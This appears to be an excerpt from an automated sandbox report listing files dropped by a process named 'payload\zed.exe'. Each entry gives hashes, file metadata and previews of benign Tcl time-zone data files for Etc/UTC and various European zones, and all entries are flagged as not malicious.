                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/yRaQEBURFB:SlSWB9vsM3yzTHAIgm6N/yRYaRX
                                                                                                                                                                                                                                            MD5:EDABCAC858EC9632D5D8DCCFB28F4D6E
                                                                                                                                                                                                                                            SHA1:E5BEF1367A97A1900749CE6B1E01CF32F582BDD9
                                                                                                                                                                                                                                            SHA-256:BBD6E93206FF3B7017AFBE63905B4C932C422B582F3CE2A79A7B885D390EE555
                                                                                                                                                                                                                                            SHA-512:3A22364D423F2F970123561408018A2B72F43C4978836D3B6DF7517217445605838DCB8DDBDA204FD01C49A4A7D5ADAD4CA8BDA7C3B412D54750BAEAA589B683
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Etc/Zulu) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.892809684252761
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/So3vXHAIgoq82yHRL/yQaiFAXowQahCv:SlSWB9vsM3ymhS2HAIgoh26N/ywAXoww
                                                                                                                                                                                                                                            MD5:B0B409D665190569A56697799FBA5CD3
                                                                                                                                                                                                                                            SHA1:840AA7D61E64ACE61FDDAB96F716575A61CEDB52
                                                                                                                                                                                                                                            SHA-256:46141E7BC0F99D2117319C661569F8B38AF7D00108CED5784FA3A3B5090EF8E9
                                                                                                                                                                                                                                            SHA-512:D7C0588D98AC46B5191D7C7E8F5181E94306EFFCC9E3F2DBA9E0003BAE51D992334527ADDD6D0C9701CFD60169A74984B3401E7A6A1322A734BC3D90DCC933BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Brussels)]} {.. LoadTimeZoneFile Europe/Brussels..}..set TZData(:Europe/Amsterdam) $TZData(:Europe/Brussels)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6927
                                                                                                                                                                                                                                            Entropy (8bit):3.8182041031531897
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:CA34elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:CI41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:D897DCA686A03495EB2C3323FAB0BEAD
                                                                                                                                                                                                                                            SHA1:1433BC303DE92F7B36F881C8595A42B35E0814FC
                                                                                                                                                                                                                                            SHA-256:F0B48DA7CA3659450D87CC0DDFDDFD28B464543DF1EE40D935C44D5CD7C9B9B3
                                                                                                                                                                                                                                            SHA-512:A1C4AE1E0EC26B159B0F5D058A7A77B8774F611A4D3C6AECEDD7186957D6BD9F15CDFCBA248FCC8A4B4146BD72CD7D66B9F88A2BF7CDEF416F1831A2F335D48C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Andorra) {.. {-9223372036854775808 364 0 LMT}.. {-2177453164 0 0 WET}.. {-733881600 3600 0 CET}.. {481078800 7200 0 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 3600 0 CET}.. {733280400 7200 1 CEST}.. {749005200 3600 0 CET}.. {764730000 7200 1 CEST}.. {780454800 3600 0 CET}.. {796179600 7200 1 CEST}.. {811904400 3600 0 CET}.. {828234000 7200 1 CEST}.. {846378000 3600 0 CET}.. {859683600 7200 1 CEST}.. {877827600 3600 0 CET}.. {891133200 7200 1 CEST}.. {909277200 3600 0 CET}.. {922582800 7200 1 CEST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2063
                                                                                                                                                                                                                                            Entropy (8bit):3.679377249443024
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:TvCAs6kKR6aQmF1cSNWrI+AjXgV/Ap40FjDOP:rCAs6kC6aZF1cSN4I+AjXgV/ApDFjDM
                                                                                                                                                                                                                                            MD5:CB860328FA96A14055BF51A3B2D35A08
                                                                                                                                                                                                                                            SHA1:CFA49DC861F4AC3D29A78D63D71C2D6D83D68F84
                                                                                                                                                                                                                                            SHA-256:4B5FB0AF225974D117374028285F20A02B833FF4136E6BFAE7B65E6D6D28829E
                                                                                                                                                                                                                                            SHA-512:960152826F4245012462E53F80B69B0C45C27D75D46C70D485674CA19071DF268671C7691B614BE53B9E7BD8CFEC5D24F3DCF933F2F14D827F2A32EB347D7540
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Astrakhan) {.. {-9223372036854775808 11532 0 LMT}.. {-1441249932 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7954
                                                                                                                                                                                                                                            Entropy (8bit):3.7252594544513795
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:1D/8QdzFu+f+uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYf:Z/8ohvyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:8B2C99E1CD04D7559709FDF8D382343C
                                                                                                                                                                                                                                            SHA1:C595D5159C742B815AF89EC8604376E01291F9F1
                                                                                                                                                                                                                                            SHA-256:47353319419505AAB205C23F8C97EA0B12E5DED2113147794F77B67349AFF52F
                                                                                                                                                                                                                                            SHA-512:227CA21A3B6160357988582E261A62AE7B09D46D479EABFAC8039185D710EFA765CD1694F4388EBF8800978A1E1DB69F6AF9BB9BF82C0FCD66E883930E1F8249
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Athens) {.. {-9223372036854775808 5692 0 LMT}.. {-2344642492 5692 0 AMT}.. {-1686101632 7200 0 EET}.. {-1182996000 10800 1 EEST}.. {-1178161200 7200 0 EET}.. {-906861600 10800 1 EEST}.. {-904878000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844477200 7200 1 CEST}.. {-828237600 3600 0 CET}.. {-812422800 7200 0 EET}.. {-552362400 10800 1 EEST}.. {-541652400 7200 0 EET}.. {166485600 10800 1 EEST}.. {186184800 7200 0 EET}.. {198028800 10800 1 EEST}.. {213753600 7200 0 EET}.. {228873600 10800 1 EEST}.. {244080000 7200 0 EET}.. {260323200 10800 1 EEST}.. {275446800 7200 0 EET}.. {291798000 10800 1 EEST}.. {307407600 7200 0 EET}.. {323388000 10800 1 EEST}.. {338936400 7200 0 EET}.. {347148000 7200 0 EET}.. {354675600 10800 1 EEST}.. {370400400 7200 0 EET}.. {386125200 10800 1 EEST}.. {401850000 7200 0 EET}.. {417574800 10800 1 EEST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.876296755647751
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQahs3QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/y72
                                                                                                                                                                                                                                            MD5:7160C6EE32380846653F016AE8AFD52A
                                                                                                                                                                                                                                            SHA1:DE7805089639C54893F2107FA67342DA72A79BBC
                                                                                                                                                                                                                                            SHA-256:557023674F6E8376707517103EE69C1DEBBE53CDD4BCAB11E763CC53B9CB1908
                                                                                                                                                                                                                                            SHA-512:FDBDECBBDB0C419226E2604608FD2923CFB06E4B6948493208FD83FD796880E81F6147C0FAFEB572079C9C916831B7B055620EC939164CCA1DAF76897BE60F2C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Belfast) $TZData(:Europe/London)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7309
                                                                                                                                                                                                                                            Entropy (8bit):3.8204712502914653
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:lp+/4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:lY41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:02A003411B61A311896A6407B622152A
                                                                                                                                                                                                                                            SHA1:3B8BC6D1AF698CE7BB14A08307F5A4295EB8ED03
                                                                                                                                                                                                                                            SHA-256:74B225511B518B0CED972CBB33D694697712CCB96A6D81E0F50ADA28CF6E2C92
                                                                                                                                                                                                                                            SHA-512:9E03B3EB1E528E5B1ADBA09F808E73BF9C4314EDCBF6F96E46844D51A5F425BED3EE8FD5BA8706C46A7FB9882485F119F81996F2EAB7E1E9B598978C402DDE0F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Belgrade) {.. {-9223372036854775808 4920 0 LMT}.. {-2713915320 3600 0 CET}.. {-905824800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-777942000 7200 1 CEST}.. {-766623600 3600 0 CET}.. {407199600 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 360
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8020
                                                                                                                                                                                                                                            Entropy (8bit):3.820756136386754
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Pi9+qFR274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:PQs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:84027C3C8315BD479B38DE11F38E873F
                                                                                                                                                                                                                                            SHA1:6E92A2A9734A9C6B02ECCD99F114D667C909C5BA
                                                                                                                                                                                                                                            SHA-256:7E7111F06288069B52A4E1CA0B016216DF9328FB3B1560A740146497CCDD4D24
                                                                                                                                                                                                                                            SHA-512:5FFDE523021FC0C490261F55999204C9CE6C8C274888525EA6EE7C01BC5CCABC7A3877FD454B4167D81F4B89BACB087E8BA6AB0BAC46C2874ED9257BE2092340
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Berlin) {.. {-9223372036854775808 3208 0 LMT}.. {-2422054408 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-776559600 10800 0 CEMT}.. {-765936000 7200 1 CEST}.. {-761180400 3600 0 CET}.. {-757386000 3600 0 CET}.. {-748479600 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-717631200 7200 1 CEST}.. {-714610800 10800 1 CEMT}.. {-710380800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {315529200 3600 0 CET}.. {323830800 7200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.943205109348136
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVtXrAeovXHAIgoquXrsY6RL/yQahcvEB5yQazXrH:SlSWB9vsM3ymzbAeSHAIgozbsY6N/y7c
                                                                                                                                                                                                                                            MD5:C69AB60BE74D4BB7E31BE4E5ECCD8FD2
                                                                                                                                                                                                                                            SHA1:9DD0BA6171080F074858EF88ADA2E91C1F465619
                                                                                                                                                                                                                                            SHA-256:1D7C539AAA1E3AD5EF3574A629523B5B781F1A91D352C9B39B8DE7316756026E
                                                                                                                                                                                                                                            SHA-512:C273B97CCFB5F328EB7A13CCA3126DE8D91B3876CBD248990C0BE063DDBE5B0F31EA138E31A1C5C43B1ABCF42EA511448E6DC589EB99E8172D7C2A68BA31A8E7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Prague)]} {.. LoadTimeZoneFile Europe/Prague..}..set TZData(:Europe/Bratislava) $TZData(:Europe/Prague)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9223
                                                                                                                                                                                                                                            Entropy (8bit):3.8450929464870804
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:RhcSQnG1Czyc1+FdDKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcM:Rh8zyc4Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:E6C1153C3F71C8C005D7A46DDF6461FB
                                                                                                                                                                                                                                            SHA1:CBDF7D5D36AF57D83859C910B493464617EC9571
                                                                                                                                                                                                                                            SHA-256:1402A2072ADC9EBB35F4C0368D2E9A7A11493626C667C022614FFB7CC05B6CB6
                                                                                                                                                                                                                                            SHA-512:8B1B47678F75DBE59DB08E034F0701BD11FF4FD3AD0304C8ABF45E848F717D2787B8E47558D3C334D369E0938C633DC217178D3EAE6486CEFBE25CF1668479F6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Brussels) {.. {-9223372036854775808 1050 0 LMT}.. {-2840141850 1050 0 BMT}.. {-2450995200 0 0 WET}.. {-1740355200 3600 0 CET}.. {-1693702800 7200 0 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1613826000 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585530000 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1520557200 0 0 WET}.. {-1507510800 3600 1 WEST}.. {-1490576400 0 0 WET}.. {-1473642000 3600 1 WEST}.. {-1459126800 0 0 WET}.. {-1444006800 3600 1 WEST}.. {-1427677200 0 0 WET}.. {-1411952400 3600 1 WEST}.. {-1396227600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301263200 0 0 WET}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7974
                                                                                                                                                                                                                                            Entropy (8bit):3.7264631277913853
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:vMSsQMAz5CXNU5paNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:vMS1kdUoivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:88DB5686937D3499A8142413B2CF2EB5
                                                                                                                                                                                                                                            SHA1:E37BAD2127553600D0E38A43053D1B07B2498DA8
                                                                                                                                                                                                                                            SHA-256:C560D45104A8DD73FC7370B5AC1615E22043DBC93DFB46A9ECC6468C2D38B19A
                                                                                                                                                                                                                                            SHA-512:375B8A63CFF2E278CD8C78BF9DBC86288FFB1AD57DAED00CD2199F0B05F4FBFA7D17D93C6458B20B86F6D05F3E3A49D594E60AC97DDB47141E21D7CDE10F8456
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Bucharest) {.. {-9223372036854775808 6264 0 LMT}.. {-2469404664 6264 0 BMT}.. {-1213148664 7200 0 EET}.. {-1187056800 10800 1 EEST}.. {-1175479200 7200 0 EET}.. {-1159754400 10800 1 EEST}.. {-1144029600 7200 0 EET}.. {-1127700000 10800 1 EEST}.. {-1111975200 7200 0 EET}.. {-1096250400 10800 1 EEST}.. {-1080525600 7200 0 EET}.. {-1064800800 10800 1 EEST}.. {-1049076000 7200 0 EET}.. {-1033351200 10800 1 EEST}.. {-1017626400 7200 0 EET}.. {-1001901600 10800 1 EEST}.. {-986176800 7200 0 EET}.. {-970452000 10800 1 EEST}.. {-954727200 7200 0 EET}.. {296604000 10800 1 EEST}.. {307486800 7200 0 EET}.. {323816400 10800 1 EEST}.. {338940000 7200 0 EET}.. {354672000 10800 0 EEST}.. {370396800 7200 0 EET}.. {386121600 10800 1 EEST}.. {401846400 7200 0 EET}.. {417571200 10800 1 EEST}.. {433296000 7200 0 EET}.. {449020800 10800 1 EEST}.. {465
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8287
                                                                                                                                                                                                                                            Entropy (8bit):3.8244305880244567
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:rHw0+D5xp4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:rQXj41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:11468F958796F971ADD5FB1A0C426D78
                                                                                                                                                                                                                                            SHA1:3FA58BEF391BCF7BAC6A124D093B6505B4EAC452
                                                                                                                                                                                                                                            SHA-256:B58F3E9066B8B57EB037D509636AA67A06ACC8348BE6C48482D87CDC49844A4E
                                                                                                                                                                                                                                            SHA-512:0492EABD6EE16392C00A196AF38995E5F9E55E30A82A50EFFB381DC978E9E63E801555CDC219869E6251BD51115972F742D8A7D9524372B8B11702AE4B28BFB7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Budapest) {.. {-9223372036854775808 4580 0 LMT}.. {-2498260580 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1640998800 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1600470000 7200 1 CEST}.. {-1587250800 3600 0 CET}.. {-1569711600 7200 1 CEST}.. {-1555196400 3600 0 CET}.. {-906775200 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-778471200 7200 1 CEST}.. {-762656400 3600 0 CET}.. {-749689200 7200 1 CEST}.. {-733276800 3600 0 CET}.. {-717634800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-686185200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {-492656400 7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.952483060656419
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVnCMPfXHAIgoqkCM4ARL/yQahDZALMFB5h8Qa5CMS:SlSWB9vsM3ym5XPHAIgo5gAN/y7D17/f
                                                                                                                                                                                                                                            MD5:CED145F8D9B231234E021D2214C1064B
                                                                                                                                                                                                                                            SHA1:7B111DC24CA01C78A382CECD3247CF495D71CD34
                                                                                                                                                                                                                                            SHA-256:F511A80AB70FF93A0EB9F29293F73DF952B773BB33EB85D581E4FB1FE06E4F05
                                                                                                                                                                                                                                            SHA-512:E2323C04BF99909ABA9A09A66F9B4696519B5F9FE3AF178FB04D5E0053F41CAA8B937DC4148954ED093D317F454E0547786BEC934F2ABF22A60AAA6A24E63BF9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Zurich)]} {.. LoadTimeZoneFile Europe/Zurich..}..set TZData(:Europe/Busingen) $TZData(:Europe/Zurich)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8096
                                                                                                                                                                                                                                            Entropy (8bit):3.7635458172251406
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:jXSsijEpkv2XkN8qc/OyEie8hF5WQ9VX/Zs1cw27oXqdCA5XqjqFLigTE9s5VpJ:jXS+WeUqKie8hF5f9PwdXM9
                                                                                                                                                                                                                                            MD5:E7F52393523729CA3916768B3F3B4E55
                                                                                                                                                                                                                                            SHA1:1524A3E610DCD33AC0006946BAB2929CA7F5A33F
                                                                                                                                                                                                                                            SHA-256:2BD1C0AB412A5E9C97F533C4D06B773D045215B92568A4E89ADC93C7462D62EC
                                                                                                                                                                                                                                            SHA-512:218674ECD9FD6C1A1C83EE69AFE6AA5AD0D5A8BB59FF497FDF2573B7CF52DAE98ECE0815CF99668CA4E172FF67D220B227369865076333B3EE802A8839C65279
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Chisinau) {.. {-9223372036854775808 6920 0 LMT}.. {-2840147720 6900 0 CMT}.. {-1637114100 6264 0 BMT}.. {-1213148664 7200 0 EET}.. {-1187056800 10800 1 EEST}.. {-1175479200 7200 0 EET}.. {-1159754400 10800 1 EEST}.. {-1144029600 7200 0 EET}.. {-1127700000 10800 1 EEST}.. {-1111975200 7200 0 EET}.. {-1096250400 10800 1 EEST}.. {-1080525600 7200 0 EET}.. {-1064800800 10800 1 EEST}.. {-1049076000 7200 0 EET}.. {-1033351200 10800 1 EEST}.. {-1017626400 7200 0 EET}.. {-1001901600 10800 1 EEST}.. {-986176800 7200 0 EET}.. {-970452000 10800 1 EEST}.. {-954727200 7200 0 EET}.. {-927165600 10800 1 EEST}.. {-898138800 7200 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-800154000 10800 0 MSD}.. {354920400 14400 1 MSD}.. {370728000 10800 0 MSK}.. {386456400 14400 1 MSD}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.925156646979837
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/yQagKVihh8Qahyuv:SlSWB9vsM3ymhVoPHAIgoh6N/yy87Fv
                                                                                                                                                                                                                                            MD5:3AEDE4B340D0250D496C49CADBA04E62
                                                                                                                                                                                                                                            SHA1:C466D8275C465752F5B024615268F6D1CBBA4B41
                                                                                                                                                                                                                                            SHA-256:2B9A0F1775355E311FB63903E3829F98B5F6C73C08F1BECE1A2D471ACC2673E3
                                                                                                                                                                                                                                            SHA-512:2B08B57D58699C65A9AAA43AC87F29DD1EDCBA9F91E79DF4B1E07832032F5B03A43847E20345484730E8D2323199E7439D8C1FC662E812E8BA6EE19C53C89681
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Europe/Copenhagen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9810
                                                                                                                                                                                                                                            Entropy (8bit):3.7678769652077873
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:sExxHZiMU8EKTy74jT56XdEN1+UZBdMN186LPR:sEzZiMUZ6y0jT5bZHMN186LPR
                                                                                                                                                                                                                                            MD5:E1EB426EA3351AF0D7D563006F9146BC
                                                                                                                                                                                                                                            SHA1:1E94F3B38366FE43BB031A57D19894B569EBABED
                                                                                                                                                                                                                                            SHA-256:895957521D6CA4DE7E4089DC587A6C177B803D8ADF63303B1F85DEB279726324
                                                                                                                                                                                                                                            SHA-512:8F24E9519F5D42F34AEE5C52A94CAC7D035EAE7B31DC3E629C29CFE3BD85F1510188290D35CD327492A030168443FED8BD80EC57ED27811B786C4DC89B4B1181
                                                                                                                                                                                                                                            Malicious:false
